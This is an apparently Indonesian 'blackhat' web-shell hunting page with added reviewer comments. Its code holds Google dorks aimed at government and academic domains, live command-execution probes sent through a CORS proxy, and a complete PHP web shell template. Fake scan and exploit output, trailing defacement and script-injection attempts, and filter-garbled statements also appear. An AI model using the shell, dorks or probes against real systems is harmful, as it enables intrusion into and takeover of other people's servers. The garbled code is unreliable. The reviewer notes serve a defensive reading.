<!DOCTYPE html>
<!--
  NOTE(review): document head of a page whose title and headings present it as a
  front end for a web-shell scanner. This block is presentation only: one inline
  stylesheet and no script.
-->
<html lang="id"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Kerang.php Mass Hunter v3.0</title> <style>
/* Global reset and monospace "terminal" look. */
* { margin: 0; padding: 0; box-sizing: border-box; font-family: 'Courier New', monospace; }
body { background: #0a0a0a; color: #0f0; padding: 20px; min-height: 100vh; overflow-x: hidden; }
/* Fixed, non-interactive layer behind the content (z-index -1, pointer-events none). */
.matrix-bg { position: fixed; top: 0; left: 0; width: 100%; height: 100%; z-index: -1; opacity: 0.1; pointer-events: none; }
.container { max-width: 1200px; margin: 0 auto; background: rgba(10, 20, 10, 0.9); border: 1px solid #0f0; border-radius: 5px; padding: 20px; box-shadow: 0 0 20px rgba(0, 255, 0, 0.3); }
header { text-align: center; padding: 20px 0; border-bottom: 1px solid #0f0; margin-bottom: 20px; }
h1 { color: #0f0; text-shadow: 0 0 10px #0f0; margin-bottom: 10px; }
.subtitle { color: #8f8; font-size: 14px; }
.section { margin: 20px 0; padding: 15px; border: 1px solid #333; border-radius: 5px; background: rgba(0, 20, 0, 0.5); }
h2 { color: #8f8; margin-bottom: 15px; border-bottom: 1px solid #333; padding-bottom: 5px; }
/* Grid of selectable search-query entries; the page script creates the .dork-item children. */
.dork-list { display: grid; grid-template-columns: repeat(auto-fill, minmax(300px, 1fr)); gap: 10px; margin: 15px 0; }
.dork-item { background: rgba(0, 30, 0, 0.7); padding: 10px; border: 1px solid #333; border-radius: 3px; cursor: pointer; transition: all 0.3s; }
.dork-item:hover { border-color: #0f0; background: rgba(0, 40, 0, 0.7); }
.controls { display: flex; gap: 10px; flex-wrap: wrap; margin: 15px 0; }
button { background: #003300; color: #0f0; border: 1px solid #0f0; padding: 10px 20px; border-radius: 3px; cursor: pointer; transition: all 0.3s; font-weight: bold; }
button:hover { background: #005500; box-shadow: 0 0 10px #0f0; }
button:disabled { opacity: 0.5; cursor: not-allowed; }
input[type="text"], textarea { width: 100%; padding: 10px; background: #001100; border: 1px solid #333; color: #0f0; border-radius: 3px; margin: 10px 0; }
textarea { min-height: 150px; 
font-family: monospace; font-size: 12px; }
/* Hidden by default; the page script sets display: block on the status element when it has a message to show. */
.status { padding: 10px; background: #002200; border: 1px solid #333; border-radius: 3px; margin: 10px 0; display: none; }
.log { background: #000; padding: 10px; border: 1px solid #333; border-radius: 3px; min-height: 200px; max-height: 400px; overflow-y: auto; font-size: 12px; white-space: pre-wrap; }
.log-line { padding: 2px 0; border-bottom: 1px solid #111; }
/* Colour per log level; the script appends one of these class names to each log line. */
.success { color: #0f0; } .error { color: #f00; } .warning { color: #ff0; } .info { color: #0af; }
.results { display: grid; grid-template-columns: repeat(auto-fill, minmax(350px, 1fr)); gap: 10px; margin: 15px 0; }
.result-card { background: rgba(0, 40, 0, 0.7); border: 1px solid #333; border-radius: 3px; padding: 15px; }
.result-card.vulnerable { border-color: #0f0; box-shadow: 0 0 10px rgba(0, 255, 0, 0.5); }
.progress-bar { width: 100%; height: 20px; background: #001100; border: 1px solid #333; border-radius: 3px; overflow: hidden; margin: 10px 0; }
.progress-fill { height: 100%; background: #0f0; width: 0%; transition: width 0.3s; }
.tab-container { margin: 20px 0; }
.tabs { display: flex; border-bottom: 1px solid #333; }
.tab { padding: 10px 20px; cursor: pointer; border: 1px solid transparent; border-bottom: none; margin-right: 5px; }
.tab.active { background: #003300; border-color: #333; border-bottom: 1px solid #0a0a0a; margin-bottom: -1px; }
/* Tab panels are hidden unless they also carry .active. */
.tab-content { padding: 20px; border: 1px solid #333; border-top: none; display: none; }
.tab-content.active { display: block; }
/* Red variant used by the "Auto Exploit" button in the page body. */
.exploit-btn { background: #550000; color: #f00; border-color: #f00; }
.exploit-btn:hover { background: #770000; box-shadow: 0 0 10px #f00; }
footer { text-align: center; margin-top: 20px; padding-top: 20px; border-top: 1px solid #333; color: #666; font-size: 12px; }
</style> </head> <body> ???? 
<!--
  NOTE(review): visible text and controls of the tool's four tabs (Scanner, Dork
  Database, Exploiter, Logs). The wrapping elements are missing from this copy:
  there are no tab containers, and none of the ids the page's script looks up
  (mainLog, exploitLog, resultsContainer, dorkList, scanStatus, statusText,
  progressFill, matrixBg) appear below. Handlers are bound through inline
  onclick attributes that name functions defined in the page's script.
-->
Kerang.php Mass Hunter v3.0 Blackhat Web Shell Scanner & Auto-Exploiter Scanner Dork Database Exploiter Logs
<!-- SCANNER TAB -->
<!-- Placeholder text is Indonesian: "Enter target URL (example: ...)". -->
Target Scanner <input type="text" id="targetUrl" placeholder="Masukkan URL target (contoh: https://target.com/kerang.php)">
<button onclick="scanSingle()">Scan Target</button>
<!-- NOTE(review): labelled "Google Dork", but the startMassScan handler in this page's script sends no search or HTTP request; it displays randomly generated results. -->
<button onclick="startMassScan()">Mass Scan (Google Dork)</button>
<button onclick="stopScan()" id="stopBtn" disabled>Stop Scan</button> Status: Ready
<!-- Results will appear here -->
<!-- DORKS TAB -->
Dork Database (50+ Backdoor Dorks) <button onclick="selectAllDorks()">Select All</button> <button onclick="deselectAllDorks()">Deselect All</button> <button onclick="copyDorks()">Copy Selected</button>
<!-- Dorks loaded by JS -->
<!-- EXPLOITER TAB -->
<!-- Placeholders are Indonesian: "Shell URL (example: ...)" and "Enter shell commands...". -->
Manual Exploitation <input type="text" id="shellUrl" placeholder="URL Shell (contoh: http://target.com/kerang.php?cmd=whoami)"> <input type="text" id="commandParam" placeholder="Command Parameter (default: cmd)">
<!--
  NOTE(review): the pre-filled command list is generic host reconnaissance
  (whoami, id, uname -a, pwd, ls -la, cat /etc/passwd). For defenders, these
  strings showing up as the value of a cmd-style query parameter in web access
  logs are a common sign that a web shell is being used.
-->
<textarea id="customCommand" placeholder="Masukkan perintah shell..."> whoami id uname -a pwd ls -la cat /etc/passwd</textarea>
<button onclick="executeCommand()">Execute Command</button> <button class="exploit-btn" onclick="autoExploit()">Auto Exploit</button> <button onclick="uploadShell()">Upload Web Shell</button>
<!-- LOGS TAB -->
Scan Logs <button onclick="clearLogs()">Clear Logs</button> <button onclick="exportLogs()">Export Logs</button> <button onclick="saveResults()">Save Results</button> ⚠️ For Educational & Authorized Testing Only Tool by lisa ???? 
| Blackhat Edition v3.0 [removed]
// NOTE(review): this copy of the script has been through an input filter. The
// `[removed]` and `xss=removed` markers replace text the filter stripped
// (presumably script tags and `.innerHTML` property names - confirm against the
// filter in use), so several statements below are no longer valid JavaScript.
// Most "scan" and "exploit" actions are timers printing canned or random text;
// the one function that issues network requests is fetchTarget().

// DORK DATABASE
// Search-engine query strings. In the visible code they are only rendered as
// checkboxes, counted, and copied to the clipboard; nothing here submits them to
// a search engine. Defender's reading: the file names and parameters listed
// (c99.php, r57.php, wso.php, b374k.php, ?cmd=, ?exec=) are worth searching for
// in your own web roots and access logs.
const dorks = [
    'inurl:.kerang.php', '"kerang.php" "cmd"', '"kerang.php" "password"', '"kerang.php" "by"', '"kerang.php" "upload"',
    'intitle:"kerang" filetype:php', 'intext:"kerang.php" "shell"', '"kerang.php" site:id',
    'inurl:"shell.php"', 'inurl:"c99.php"', 'inurl:"r57.php"', 'inurl:"wso.php"', 'inurl:"b374k.php"', 'inurl:"upload.php"',
    '"php?cmd="', '"php?exec="', '"php?command="',
    'site:id "php" "shell"', 'site:go.id "php" "backdoor"', 'site:ac.id "upload" "php"', '"indonesia" "shell" "php"',
    '"file upload" "php"', '"upload" "shell" "php"', '"uploader" "by" "php"',
    '"config.php" intext:"password"', '"db.php" "mysql"', '"connect.php" "root"', '"login.php" "admin" "123"', '"admin" "password" "php"',
    'inurl:"phpmyadmin"', 'inurl:"wp-admin"',
    '"?x=" "system"', '"?q=" "exec"', '"?a=" "eval"',
    '".hidden.php"', '".config.php"', '".backdoor.php"',
    '"base64_decode" "php"', '"eval(gzinflate" "php"',
    'inurl:"/admin/" "php"', '"panel/login.php"', '"database.php" "pass"', 'intext:"$password" "php"', 'inurl:"/backup/" "sql"',
    '"phpinfo()" "inurl"', 'inurl:"test.php" "shell"', '"hacked by" "php"', 'inurl:"/tmp/" "php"', 'inurl:"/data/" "config"',
    '"cpanel" "bypass"', '"wp-json" "rest"', '"api.php" "admin"', '"dashboard" "unauth"', '"filemanager" "upload"', '"bypass" "login" "php"'
];

// STATE VARIABLES
let scanActive = false;     // true while the mass-scan interval is meant to run
let scanResults = [];       // entries pushed by startMassScan when flagged vulnerable
let currentScanId = null;   // setInterval handle for the mass-scan timer

// DOM ELEMENTS
// Looked up once at script load. None of these ids is present in the markup
// visible in this copy of the page.
const mainLog = document.getElementById('mainLog');
const exploitLog = document.getElementById('exploitLog');
const resultsContainer = document.getElementById('resultsContainer');
const dorkList = document.getElementById('dorkList');
const scanStatus = document.getElementById('scanStatus');
const statusText = document.getElementById('statusText');
const progressFill = document.getElementById('progressFill');
const stopBtn = document.getElementById('stopBtn');

// INITIALIZE
// On DOM ready: start the background animation, render the dork list, log a banner.
document.addEventListener('DOMContentLoaded', function() {
    initMatrixBackground();
    loadDorks();
    logMessage('System initialized. Ready to scan.', 'info');
});

// MATRIX BACKGROUND
// Decorative only: creates a full-window canvas inside #matrixBg and redraws it
// on a 35 ms interval.
function initMatrixBackground() {
    const canvas = document.createElement('canvas');
    canvas.id = 'matrixCanvas';
    canvas.style.position = 'fixed';
    canvas.style.top = '0';
    canvas.style.left = '0';
    canvas.style.width = '100%';
    canvas.style.height = '100%';
    canvas.style.zIndex = '-1';
    canvas.style.opacity = '0.05';
    document.getElementById('matrixBg').appendChild(canvas);
    const ctx = canvas.getContext('2d');
    canvas.width = window.innerWidth;
    canvas.height = window.innerHeight;
    const chars = '01abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ$+-*/=%"\'#&_(),.;:?!\\|{}<>[]^~';
    const charArray = chars.split('');
    const fontSize = 14;
    const columns = canvas.width / fontSize;
    const drops = [];
    // NOTE(review): the rest of the for-loop header and most of the drawMatrix
    // definition were lost to the filter (the `xss=removed` markers); the line
    // below is kept exactly as found and does not parse.
    for(let i = 0; i < columns xss=removed ctx.fillStyle = 'rgba(0, 10, 0, 0.04)' ctx.fillStyle = '#0f0' xss=removed xss=removed xss=removed> canvas.height && Math.random() > 0.975) { drops[i] = 0; } drops[i]++; } }
    setInterval(drawMatrix, 35);
    // Keep the canvas backing store sized to the window.
    window.addEventListener('resize', function() {
        canvas.width = window.innerWidth;
        canvas.height = window.innerHeight;
    });
}

// TAB SYSTEM
// Deactivates every tab and panel, then activates the tab whose inline onclick
// attribute contains `tabName` and the panel whose id equals `tabName`.
function switchTab(tabName) {
    document.querySelectorAll('.tab').forEach(tab => tab.classList.remove('active'));
    document.querySelectorAll('.tab-content').forEach(content => content.classList.remove('active'));
    document.querySelector(`.tab[onclick*="${tabName}"]`).classList.add('active');
    document.getElementById(tabName).classList.add('active');
}

// DORK MANAGEMENT
// Renders one pre-checked checkbox per entry of `dorks` into the dork list.
function loadDorks() {
    // `[removed]` is presumably a stripped `.innerHTML` (here and on `div` below) - confirm.
    dorkList[removed] = '';
    dorks.forEach((dork, index) => {
        const div = document.createElement('div');
        div.className = 'dork-item';
        // The dork text is interpolated into markup unescaped; the values come
        // only from the constant array above.
        div[removed] = ` <input type="checkbox" id="dork${index}" checked> ${dork} `;
        dorkList.appendChild(div);
    });
}

// Returns the entries of `dorks` whose checkbox (id "dork<index>") is ticked.
function getSelectedDorks() {
    const selected = [];
    dorks.forEach((dork, index) => {
        const checkbox = document.getElementById(`dork${index}`);
        if (checkbox && checkbox.checked) 
        { selected.push(dork); }
    });
    return selected;
}

// Ticks every dork checkbox that exists.
function selectAllDorks() {
    dorks.forEach((_, index) => {
        const checkbox = document.getElementById(`dork${index}`);
        if (checkbox) checkbox.checked = true;
    });
}

// Unticks every dork checkbox that exists.
function deselectAllDorks() {
    dorks.forEach((_, index) => {
        const checkbox = document.getElementById(`dork${index}`);
        if (checkbox) checkbox.checked = false;
    });
}

// Copies the selected dorks, newline-separated, to the clipboard.
function copyDorks() {
    const selected = getSelectedDorks();
    // The promise returned by writeText() is not awaited, so the success line
    // below is logged even if the clipboard write is rejected.
    navigator.clipboard.writeText(selected.join('\n'));
    logMessage(`Copied ${selected.length} dorks to clipboard`, 'success');
}

// LOGGING SYSTEM
// Appends a timestamped line to the main log and mirrors it to the console.
// `type` is used as a CSS class name and defaults to 'info'. The message is
// assigned through textContent, so it is never parsed as markup.
function logMessage(message, type = 'info') {
    const timestamp = new Date().toLocaleTimeString();
    const logLine = document.createElement('div');
    logLine.className = `log-line ${type}`;
    logLine.textContent = `[${timestamp}] ${message}`;
    mainLog.appendChild(logLine);
    mainLog.scrollTop = mainLog.scrollHeight;
    // Also show in status
    if (type === 'error' || type === 'success') {
        statusText.textContent = message;
        scanStatus.style.display = 'block';
        scanStatus.className = `status ${type}`;
    }
    console.log(`[${type}] ${message}`);
}

// Empties both log panels, then records that it did so.
function clearLogs() {
    mainLog[removed] = '';
    exploitLog[removed] = '';
    logMessage('Logs cleared', 'warning');
}

// SCANNING FUNCTIONS
// Probes the URL typed into #targetUrl via fetchTarget(), classifies the
// responses with analyzeResponse() and renders the verdict.
async function scanSingle() {
    const url = document.getElementById('targetUrl').value.trim();
    if (!url) {
        logMessage('Please enter a target URL', 'error');
        return;
    }
    logMessage(`Scanning: ${url}`, 'info');
    scanStatus.style.display = 'block';
    statusText.textContent = `Testing ${url}`;
    try {
        const response = await fetchTarget(url);
        const result = analyzeResponse(url, response);
        displayResult(result);
        if (result.vulnerable) {
            logMessage(`VULNERABLE: ${url} - ${result.type}`, 'success');
        } else {
            logMessage(`Not vulnerable: ${url}`, 'warning');
        }
    } catch (error) {
        logMessage(`Error scanning ${url}: ${error.message}`, 'error');
    }
}

// NOTE(review): despite the "simulate" wording in the original comment, this
// function calls fetch() and therefore sends real requests. It issues four GETs
// per target (three with a `cmd` query parameter, one to the bare URL), each
// routed through a public third-party CORS proxy. Consequences a defender
// should know: the requests reach the target from the proxy's address rather
// than the operator's, the proxy operator sees every probed URL, and the query
// strings cmd=whoami, cmd=id and cmd=echo test123 arriving together are this
// function's footprint in an access log.
// Returns one entry per probe: {url, status, text, headers} or {url, error}.
async function fetchTarget(url) {
    // Simulate fetching with CORS proxy approach
    const testUrls = [
        `${url}?cmd=whoami`,
        `${url}?cmd=id`,
        `${url}?cmd=echo test123`,
        url // Original URL
    ];
    const results = [];
    for (const testUrl of testUrls) {
        try {
            // Using a CORS proxy for demonstration
            const proxyUrl = `https://cors-anywhere.herokuapp.com/${testUrl}`;
            // NOTE(review): browsers may ignore a script-supplied User-Agent
            // header - verify per browser before relying on it for log matching.
            const response = await fetch(proxyUrl, {
                method: 'GET',
                headers: { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' },
                mode: 'cors',
                cache: 'no-cache'
            });
            const text = await response.text();
            results.push({ url: testUrl, status: response.status, text: text, headers: response.headers });
        } catch (error) {
            // A failed probe is recorded, not thrown, so the remaining URLs are still tried.
            results.push({ url: testUrl, error: error.message });
        }
    }
    return results;
}

// Classifies the probe responses by substring search over the lower-cased body.
// Any keyword hit in any category marks the result vulnerable; when several
// categories match, `type` ends up as the last one iterated.
// NOTE(review): the check is substring presence only. Words such as 'shell',
// 'command', 'console' or 'echo' occur on ordinary pages, and a page that
// reflects the request URL will contain the probe string itself, so a
// "VULNERABLE" verdict from this function is not evidence of command execution.
function analyzeResponse(url, responses) {
    const result = { url: url, vulnerable: false, type: 'UNKNOWN', details: [] };
    responses.forEach(resp => {
        if (resp.text) {
            const text = resp.text.toLowerCase();
            // Check for shell indicators
            const indicators = {
                'SHELL_CMD': ['whoami', 'uid=', 'www-data', 'root:x:'],
                'SHELL_OUTPUT': ['test123', 'echo', 'pwd', '/home/'],
                'SHELL_KEYWORDS': ['shell', 'command', 'terminal', 'console'],
                'BACKDOOR': ['c99', 'r57', 'wso', 'b374k'],
                'PHP_SHELL': ['<?php', 'system(', 'eval(', 'exec(']
            };
            for (const [type, keywords] of Object.entries(indicators)) {
                if (keywords.some(keyword => text.includes(keyword))) {
                    result.vulnerable = true;
                    result.type = type;
                    result.details.push(`Found ${type} indicators`);
                }
            }
            // Check HTTP response patterns
            // NOTE(review): from here the filter removed the end of
            // analyzeResponse and the start of the function that renders a
            // result card (displayResult, judging by its callers); the text is
            // kept exactly as found. What survives of the card template
            // interpolates result.url into markup and into an inline onclick
            // attribute without escaping.
            if (resp.status === 200 && text.length < 5000 uid=') && text.includes(' gid=')) { result.vulnerable = true; result.type = ' xss=removed xss=removed xss=removed>URL: ${result.url} Status: ${result.vulnerable ? 'VULNERABLE ????' : 'SAFE ????'} Type: ${result.type} ${result.details.map(detail => `${detail}`).join('')} ${result.vulnerable ? 
`<button onclick="exploitResult('${result.url}')" style="margin-top:10px;">Exploit</button>` : '' } `;
    resultsContainer.prepend(resultCard);
}

// MASS SCAN SIMULATION
// NOTE(review): no request of any kind is sent here. The selected dorks are only
// counted; every 300 ms a timer sets a random progress value and, about 30% of
// the time, displays a result built from hard-coded placeholder URLs and random
// flags. The placeholder hosts are never contacted by this function.
async function startMassScan() {
    if (scanActive) return;
    scanActive = true;
    stopBtn.disabled = false;
    progressFill.style.width = '0%';
    resultsContainer[removed] = '';
    const selectedDorks = getSelectedDorks();
    if (selectedDorks.length === 0) {
        // Returns with scanActive still true and the Stop button enabled, so
        // later calls exit at the first guard until stopScan() runs.
        logMessage('No dorks selected!', 'error');
        return;
    }
    logMessage(`Starting mass scan with ${selectedDorks.length} dorks...`, 'info');
    // Simulate scanning process
    currentScanId = setInterval(() => {
        if (!scanActive) {
            clearInterval(currentScanId);
            return;
        }
        // Simulate finding targets
        const progress = Math.random() * 100;
        progressFill.style.width = `${progress}%`;
        // Simulate finding a vulnerable site (demo purposes)
        if (Math.random() > 0.7) {
            const fakeUrls = [ 'http://test.com/kerang.php', 'http://target.com/shell.php', 'http://victim.com/admin.php', 'http://site.com/upload.php' ];
            const fakeUrl = fakeUrls[Math.floor(Math.random() * fakeUrls.length)];
            const fakeResult = {
                url: fakeUrl,
                vulnerable: Math.random() > 0.3,
                type: ['SHELL_CMD', 'BACKDOOR', 'PHP_SHELL'][Math.floor(Math.random() * 3)],
                details: ['Found shell indicators', 'Command execution possible']
            };
            displayResult(fakeResult);
            if (fakeResult.vulnerable) {
                scanResults.push(fakeResult);
                logMessage(`Found vulnerable: ${fakeUrl}`, 'success');
            }
        }
        statusText.textContent = `Scanning... ${Math.round(progress)}%`;
        // Math.random() * 100 is always below 100, so this branch cannot be
        // reached; the timer runs until stopScan() is called.
        if (progress >= 100) {
            stopScan();
            logMessage(`Scan completed! 
Found ${scanResults.length} vulnerable sites.`, 'success');
        }
    }, 300);
}

// Stops the mass-scan timer and resets the related UI state.
function stopScan() {
    scanActive = false;
    stopBtn.disabled = true;
    progressFill.style.width = '100%';
    statusText.textContent = 'Scan stopped';
    if (currentScanId) {
        clearInterval(currentScanId);
        currentScanId = null;
    }
}

// EXPLOITATION FUNCTIONS
// Copies a result URL into the #shellUrl field and switches to the 'exploiter' tab.
function exploitResult(url) {
    document.getElementById('shellUrl').value = url;
    switchTab('exploiter');
}

// NOTE(review): nothing is sent to the URL. Each non-blank line of the command
// box is echoed to the exploit log and followed, 500 ms later, by a canned
// string picked by line index from `responses`. `param` is read but never used.
function executeCommand() {
    const url = document.getElementById('shellUrl').value;
    const param = document.getElementById('commandParam').value || 'cmd';
    const commands = document.getElementById('customCommand').value.split('\n');
    if (!url) {
        logMessage('Enter shell URL first!', 'error');
        return;
    }
    exploitLog[removed] = '';
    logMessage(`Executing commands on: ${url}`, 'info');
    // Simulate command execution
    commands.forEach((cmd, index) => {
        if (cmd.trim()) {
            setTimeout(() => {
                const logLine = document.createElement('div');
                logLine.className = 'log-line info';
                logLine.textContent = `$ ${cmd}`;
                exploitLog.appendChild(logLine);
                // Simulate response
                setTimeout(() => {
                    const responses = [ 'www-data', 'uid=33(www-data) gid=33(www-data) groups=33(www-data)', 'Linux server 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux', '/var/www/html', 'total 24\ndrwxr-xr-x 3 root root 4096 Mar 1 12:00 .\ndrwxr-xr-x 3 root root 4096 Mar 1 12:00 ..', 'root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin' ];
                    const response = responses[index % responses.length] || 'Command executed';
                    const respLine = document.createElement('div');
                    respLine.className = 'log-line success';
                    respLine.textContent = response;
                    exploitLog.appendChild(respLine);
                    exploitLog.scrollTop = exploitLog.scrollHeight;
                }, 500);
            }, index * 600);
        }
    });
}

// NOTE(review): prints a fixed list of step strings at 800 ms intervals and then
// a success line. The URL is only checked for being non-empty; no request is
// made and none of the listed steps is performed by this code.
function autoExploit() {
    const url = document.getElementById('shellUrl').value;
    if (!url) {
        logMessage('Enter shell URL first!', 'error');
        return;
    }
    logMessage('Starting auto-exploitation...', 'warning');
    // Simulate exploitation steps
    const steps = [ '1. Testing command execution... ✓', '2. Gathering system information... ✓', '3. Checking for writable directories... ✓', '4. Uploading reverse shell... ✓', '5. Attempting privilege escalation... ⚠️', '6. Extracting database credentials... ✓', '7. Dumping user data... ✓' ];
    steps.forEach((step, index) => {
        setTimeout(() => {
            const logLine = document.createElement('div');
            logLine.className = 'log-line info';
            logLine.textContent = step;
            exploitLog.appendChild(logLine);
            exploitLog.scrollTop = exploitLog.scrollHeight;
            if (index === steps.length - 1) {
                setTimeout(() => {
                    const successLine = document.createElement('div');
                    successLine.className = 'log-line success';
                    successLine.textContent = '???? Exploitation successful! Shell access obtained.';
                    exploitLog.appendChild(successLine);
                }, 500);
            }
        }, index * 800);
    });
}

// NOTE(review): nothing is uploaded. After 1.5 s the function writes a success
// message, a path derived from the entered URL by string replacement, and the
// template below into the exploit log.
// The template is a minimal PHP web shell: it passes the `cmd` query parameter
// to system(), stores an uploaded file under its client-supplied name, and can
// print /etc/passwd, with error reporting switched off. Defender's reading:
// request parameters flowing straight into system() and error_reporting(0) at
// the top of a small PHP file are the patterns to search web roots for.
function uploadShell() {
    const url = document.getElementById('shellUrl').value;
    if (!url) {
        logMessage('Enter shell URL first!', 'error');
        return;
    }
    logMessage('Uploading web shell...', 'info');
    // PHP web shell template
    const phpShell = `<?php // Web Shell by lisa error_reporting(0); if(isset($_GET['cmd'])) { system($_GET['cmd']); } elseif(isset($_GET['upload'])) { if(isset($_FILES['file'])) { move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']); echo "File uploaded!"; } } elseif(isset($_GET['passwd'])) { echo file_get_contents('/etc/passwd'); } else { echo "<form method='GET'><input name='cmd'><input type='submit'></form>"; } ?>`;
    // Simulate upload
    setTimeout(() => {
        const logLine = document.createElement('div');
        logLine.className = 'log-line success';
        logLine[removed] = ` Web shell uploaded successfully! 
Access at: ${url.replace('.php', '')}_shell.php <textarea style="width:100%;height:80px;background:#001100;color:#0f0;border:none;margin-top:5px;" readonly>${phpShell}</textarea> `;
        exploitLog.appendChild(logLine);
        exploitLog.scrollTop = exploitLog.scrollHeight;
    }, 1500);
}

// UTILITY FUNCTIONS
// Downloads the main log's visible text as scan_logs.txt through a Blob URL.
// The object URL is not revoked afterwards.
function exportLogs() {
    const logs = mainLog.innerText;
    const blob = new Blob([logs], { type: 'text/plain' });
    const url = URL.createObjectURL(blob);
    const a = document.createElement('a');
    a.href = url;
    a.download = 'scan_logs.txt';
    a.click();
    logMessage('Logs exported', 'success');
}

// Downloads scanResults as vulnerable_sites.txt. In the visible code scanResults
// is filled only by startMassScan, i.e. with its randomly generated entries.
function saveResults() {
    const results = scanResults.map(r => `URL: ${r.url}\nStatus: VULNERABLE\nType: ${r.type}\nDetails: ${r.details.join(', ')}\n` ).join('\n---\n');
    const blob = new Blob([results], { type: 'text/plain' });
    const url = URL.createObjectURL(blob);
    const a = document.createElement('a');
    a.href = url;
    a.download = 'vulnerable_sites.txt';
    a.click();
    logMessage('Results saved', 'success');
}

// CORS PROXY SIMULATION (for demo only)
// Exposes fetchTarget as a property of window.
window.fetchTarget = fetchTarget;
[removed] </body> </html>
<!-- NOTE(review): this line follows the closing html tag of the tool page, so it appears to be a separate submission. The `[removed]` markers around the statement look like script tags stripped by an input filter, and the one after `document.body` looks like a stripped property name (presumably innerHTML); confirm against the filter in use. What survives is inert text: a page-defacement attempt that was neutralised but still stored and displayed. -->
[removed] document.body[removed] = 'Hacked by Ajudanxploidz'; [removed]
[removed][removed]
[removed][removed]
[removed][removed]
[removed][removed]
hahaha
hahaha
<!-- NOTE(review): looks like a script-injection probe (a bare alert call) whose opening tag was stripped by an input filter. The stray closing tag `alert` is not an HTML element and was left in place, so the text renders inert. -->
[removed]alert("hai");</alert>
[removed][removed]